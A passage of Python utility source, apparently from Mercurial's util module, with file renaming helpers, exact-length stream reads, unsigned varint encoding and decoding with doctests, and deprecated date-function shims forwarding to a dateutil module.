        holder._origdoc = eng.bundletype.__doc__
        holder._origfunc = eng.bundletype
        items[btype[0]] = holder

    return items
3906
3898
# Collect the engine docstrings so the i18n machinery can pick them up
# for translation.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3911
3903
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    def candidates():
        # First try the bare tagged name, then append increasing counters.
        yield '%s~%s' % (f, tag)
        for n in itertools.count(1):
            yield '%s~%s~%s' % (f, tag, n)

    for fn in candidates():
        if fn not in ctx and fn not in others:
            return fn
3934
3926
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    got = len(data)
    if got < n:
        # A short read means the stream ended prematurely; surface that
        # to the user as an abort rather than returning truncated data.
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (got, n))
    return data
3943
3935
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    # Accumulator renamed from ``bytes`` to ``buf``: the original name
    # shadowed the ``bytes`` builtin.
    buf = []
    while value:
        # Continuation bytes carry the high bit.
        buf.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    # Final byte has the high bit clear.
    buf.append(pycompat.bytechr(bits))

    return ''.join(buf)
3980
3972
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    shift = 0
    while True:
        # Each byte contributes its low 7 bits; the high bit marks
        # continuation.
        b = ord(readexactly(fh, 1))
        value |= (b & 0x7f) << shift
        if not (b & 0x80):
            return value
        shift += 7
4013
4005
###
# Deprecation warnings for util.py splitting
###

# Re-exported here for backwards compatibility; the canonical definitions
# live in utils.dateutil.
defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats
4021
4013
def makedate(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.makedate."""
    nouideprecwarn("'util.makedate' is deprecated, "
                   "use 'utils.dateutil.makedate'", "4.6")
    return dateutil.makedate(*args, **kwargs)
4027
4019
def datestr(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.datestr."""
    nouideprecwarn("'util.datestr' is deprecated, "
                   "use 'utils.dateutil.datestr'", "4.6")
    # NOTE(review): unlike the sibling shims, this one also dumps a stack
    # trace -- presumably a temporary aid for locating remaining callers;
    # confirm before removing.
    debugstacktrace()
    return dateutil.datestr(*args, **kwargs)
4034
4026
def shortdate(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.shortdate."""
    nouideprecwarn("'util.shortdate' is deprecated, "
                   "use 'utils.dateutil.shortdate'", "4.6")
    return dateutil.shortdate(*args, **kwargs)
4040
4032
def parsetimezone(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.parsetimezone."""
    nouideprecwarn("'util.parsetimezone' is deprecated, "
                   "use 'utils.dateutil.parsetimezone'", "4.6")
    return dateutil.parsetimezone(*args, **kwargs)
4046
4038
def strdate(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.strdate."""
    nouideprecwarn("'util.strdate' is deprecated, "
                   "use 'utils.dateutil.strdate'", "4.6")
    return dateutil.strdate(*args, **kwargs)
4052
4044
def parsedate(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.parsedate."""
    nouideprecwarn("'util.parsedate' is deprecated, "
                   "use 'utils.dateutil.parsedate'", "4.6")
    return dateutil.parsedate(*args, **kwargs)
4058
4050
def matchdate(*args, **kwargs):
    """Deprecated shim; warns, then forwards to dateutil.matchdate."""
    nouideprecwarn("'util.matchdate' is deprecated, "
                   "use 'utils.dateutil.matchdate'", "4.6")
    return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now